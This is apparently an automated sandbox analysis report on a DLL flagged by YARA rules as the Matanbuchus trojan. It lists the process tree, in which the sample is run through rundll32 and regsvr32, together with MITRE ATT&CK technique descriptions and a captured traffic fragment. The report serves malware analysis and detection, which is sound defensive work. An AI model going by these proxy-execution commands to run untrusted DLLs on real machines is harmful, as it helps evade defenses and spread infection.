94 e2 80 94 e2 80 94 e2 Data Ascii: http://scripts.sil.org/OFL-SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
2024-10-29 11:07:02 UTC	11762	IN	Data Raw: 65 6c 6c 22 20 63 6c 61 73 73 3d 22 78 2d 65 6c 20 78 2d 65 6c 2d 64 69 76 20 63 31 2d 31 20 63 31 2d 32 20 63 31 2d 32 78 20 63 31 2d 33 32 20 63 31 2d 33 33 20 63 31 2d 33 34 20 63 31 2d 31 78 20 63 31 2d 32 7a 20 63 31 2d 31 62 20 63 31 2d 33 30 20 63 31 2d 31 63 20 63 31 2d 31 65 20 63 31 2d 31 64 20 63 31 2d 31 37 20 63 31 2d 31 35 20 63 31 2d 33 39 20 63 31 2d 31 33 20 63 31 2d 31 31 20 63 31 2d 62 20 63 31 2d 63 20 63 31 2d 64 20 63 31 2d 33 36 20 63 31 2d 33 37 20 63 31 2d 65 20 63 31 2d 66 20 63 31 2d 67 22 3e 3c 64 69 76 20 64 61 74 61 2d 75 78 3d 22 42 6c 6f 63 6b 22 20 64 61 74 61 2d 61 69 64 3d 22 48 45 41 44 45 52 5f 4c 4f 47 4f 5f 52 45 4e 44 45 52 45 44 22 20 63 6c 61 73 73 3d 22 78 2d 65 6c 20 78 2d 65 6c 2d 64 69 76 20 63 31 2d 31 69 20 Data Ascii: ell" class="x-el x-el-div c1-1 c1-2 c1-2x c1-32 c1-33 c1-34 c1-1x c1-2z c1-1b c1-30 c1-1c c1-1e c1-1d c1-17 c1-15 c1-39 c1-13 c1-11 c1-b c1-c c1-d c1-36 c1-37 c1-e c1-f c1-g"><div data-ux="Block" data-aid="HEADER_LOGO_RENDERED" class="x-el x-el-div c1-1i

Target ID:	0
Start time:	07:06:24
Start date:	29/10/2024
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\audiosrv.dll"
Imagebase:	0x4c0000
File size:	126'464 bytes
MD5 hash:	51E6071F9CBA48E79F10C84515AAE618
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	07:06:24
Start date:	29/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:06:24
Start date:	29/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\audiosrv.dll",#1
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:06:24
Start date:	29/10/2024
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /i /s C:\Users\user\Desktop\audiosrv.dll
Imagebase:	0x3b0000
File size:	20'992 bytes
MD5 hash:	878E47C8656E53AE8A8A21E927C6F7E0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000003.00000002.2427764945.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Author: unknown Rule: Windows_Trojan_Matanbuchus_c7811ccc, Description: unknown, Source: 00000003.00000002.2427764945.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:06:24
Start date:	29/10/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\audiosrv.dll",#1
Imagebase:	0x6a0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:06:24
Start date:	29/10/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\audiosrv.dll,DllInstall
Imagebase:	0x6a0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:06:27
Start date:	29/10/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\audiosrv.dll,DllRegisterServer
Imagebase:	0x6a0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:06:30
Start date:	29/10/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\audiosrv.dll,DllUnregisterServer
Imagebase:	0x6a0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Module: Module Load, Network Traffic: Network Connection Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report audiosrv.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

Windows Analysis Report
audiosrv.dll